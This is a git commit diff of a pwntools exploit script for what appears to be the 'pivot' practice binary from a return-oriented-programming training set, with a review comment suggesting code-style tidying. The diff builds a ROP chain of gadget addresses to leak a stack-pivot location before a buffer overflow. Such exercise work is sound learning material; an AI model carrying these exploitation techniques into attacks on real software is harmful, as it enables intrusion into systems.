From 11cbb37694aab501681435375679c49989cdfc91 Mon Sep 17 00:00:00 2001 From: Brett Weiland Date: Sat, 19 Dec 2020 23:19:58 -0600 Subject: modified: x86_64/pivot/exploit.py new file: x86_64/pivot/exploit2.py deleted: x86_64/pivot/stest deleted: x86_64/pivot/test new file: x86_64/pivot/todo new file: x86_64/ret2csu/exploit.py new file: x86_64/ret2csu/gadgets --- x86_64/pivot/exploit.py | 14 +++----------- 1 file changed, 3 insertions(+), 11 deletions(-) (limited to 'x86_64/pivot/exploit.py') diff --git a/x86_64/pivot/exploit.py b/x86_64/pivot/exploit.py index a46b0cd..2420428 100755 --- a/x86_64/pivot/exploit.py +++ b/x86_64/pivot/exploit.py @@ -3,21 +3,14 @@ from pwn import * from os import getcwd import re -#context.terminal = ['kitty', 'sh', '-c'] -print(context.terminal) - -prog = gdb.debug('./pivot', gdbscript=''' - b pwnme - b *0x4009a5 -''' - -) +prog = process('./pivot') payload = b'' payload += p64(0x0000000000400720) # foothold@plt payload += p64(0x4009bb) # pop rax -payload += p64(601040) # foothold@plt's .got.plt entry +payload += p64(0x601040) # foothold@plt's .got.plt entry +payload += p64(0x4009c0) # mov rax, [rax] payload += p64(0x00000000004007c8) # pop rbp payload += p64(279) # should be the offset of pwnem from foothold's .got.plt @@ -27,7 +20,6 @@ payload += p64(0x4009c4) # adds the two payload += p64(0x00000000004007c1) # jmp rax prog.sendline(payload) pivit_location = int(re.findall('0x[0-9a-z]{12}', prog.readregexS('0x[0-9a-z]{12}'))[0], 16) -print(hex(pivit_location)) payload = b'' #buffer overflow -- cgit v1.2.3
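Review bot: The new `prog = process('./pivot')` line drops the debugger hook outright rather than making it selectable, so the breakpoint script removed just above has to be re-typed the next time the chain needs stepping through; pwntools' `args` flag keeps both modes in one line, `prog = gdb.debug('./pivot', gdbscript='b pwnme') if args.GDB else process('./pivot')`. The added `payload += p64(0x4009c0) # mov rax, [rax]` follows the file's pattern of bare addresses with trailing comments, which makes the chain hard to read without the disassembly at hand; a short header comment stating which build of the binary these addresses were taken from, plus named constants such as `FOOTHOLD_GOT = 0x601040` and `MOV_RAX_DEREF = 0x4009c0` used in the `p64(...)` calls, would document it in place. The neighbouring context line `payload += p64(279) # should be the offset ...` still carries a hedge in its comment; once the offset is confirmed the comment should state it as fact. The script body continues past this hunk.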